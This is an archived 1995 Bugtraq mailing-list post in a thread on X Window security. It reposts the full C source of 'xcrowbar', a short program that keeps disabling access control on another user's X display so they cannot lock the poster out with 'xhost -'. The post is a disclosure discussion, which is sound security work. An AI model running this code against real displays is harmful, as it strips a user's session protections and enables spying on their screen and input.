Bugtraq mailing list archives

xcrowbar

From: wam () cs purdue edu (William McVey)
Date: Wed, 11 Jan 1995 13:27:36 -0500


der Mouse wrote:

What's xcrowbar, and how does it "turn[] off the authority mechanisms
altogether"?  In my experience, only clients running on the local host,
or the xdm host if the server was started with xdm, can fiddle with the
access control mechanisms.


Since several people have asked me about xcrowbar in private mail.  I'm
just going to reply to the group.  xcrowbar was posted to
comp.security.unix a few months back.  Since the source code is so
short and the problem (people give access to their displays to
un trustworthy people) has a known solution (only give trustworthy
people access to your display), I'm reposting the article here. I've
attached the original article (minus a few headers) to the bottom of
this mail.  It should be obvious what it does.

As for only the local host or xdm host being able to "fiddle with the
access control mechanism", I highly doubt that the statement is true.
X servers (well, at least the distributed ones) don't pay any special
attention to whether a client is local or remote.

In any case, yes, it's true that "xhost -" doesn't magically mean
you're safe again.  What I do, to get the convenience of "xhost -"
without giving up quite as much security, is I run a front-end program
that accepts connections, ...

<snip>

I don't suppose the program you run is freely available someplace?

 -- William

 ---- Begin article about xcrowbar ----

 Article: 8570 of comp.security.unix
 From: matt () cs su oz au (Robert Matthew Barrie)
 Newsgroups: comp.security.unix
 Subject: xcrowbar.c
 Date: 1 Oct 1994 05:32:44 GMT
 Organization: Basser Department of Computer Science, University of Sydney
 Distribution: world
Message-ID: <36is9s$qrb () staff cs su oz au>

Like I said, a simple program that lets you do a XDisableAccessControl()
on a display if someone decides to "xhost -" you after you have a
pointer to their display.

matt


 --- cut here
#include <stdio.h>
#include <X11/Xlib.h>
#include <ctype.h>


main (int argc, char *argv[])
{
        Display *dpy;
    char *dis = NULL;
    int c;

    dis= argv[1]; 

    if ((dpy = XOpenDisplay(dis))==NULL){
                perror("could not open window");
                exit(0);
        }

        while ((c=getchar())!='q')
                XDisableAccessControl(dpy);

    XCloseDisplay(dpy);
}

 ---- End article about xcrowbar ----

Current thread:

Re: Xwindows security? der Mouse (Jan 06)
- Re: Xwindows security? Bennett Todd (Jan 09)
  - Re: Xwindows security? Benjamin Fried (Jan 10)
    - Re: Xwindows security? Jon Peatfield (Jan 10)
    - Re: Xwindows security? Rens Troost (Jan 11)
    - Re: Xwindows security? Jon Peatfield (Jan 11)
    - Re: Xwindows security? Rens Troost (Jan 11)
    - Re: Xwindows security? Jon Peatfield (Jan 11)
    - xcrowbar William McVey (Jan 11)
    - xcrowbar der Mouse (Jan 11)
    - Re: Xwindows security? Dave Kinchlea (Jan 11)
    - Re: Xwindows security? Adam Shostack (Jan 11)
    - Re: Xwindows security? Darren Reed (Jan 11)
    - Re: Xwindows security? Jim McCoy (Jan 11)
    - Re: Xwindows security? Julian Assange (Jan 13)
    - Re: Xwindows security? Timothy Newsham (Jan 11)
    - about /usr/etc/chill *Hobbit* (Jan 11)
    - mountd keeps vanishing (!) Eric Berggren (Jan 11)
    - Re: mountd keeps vanishing (!) Eric Kimminau (Jan 12)

(Thread continues...)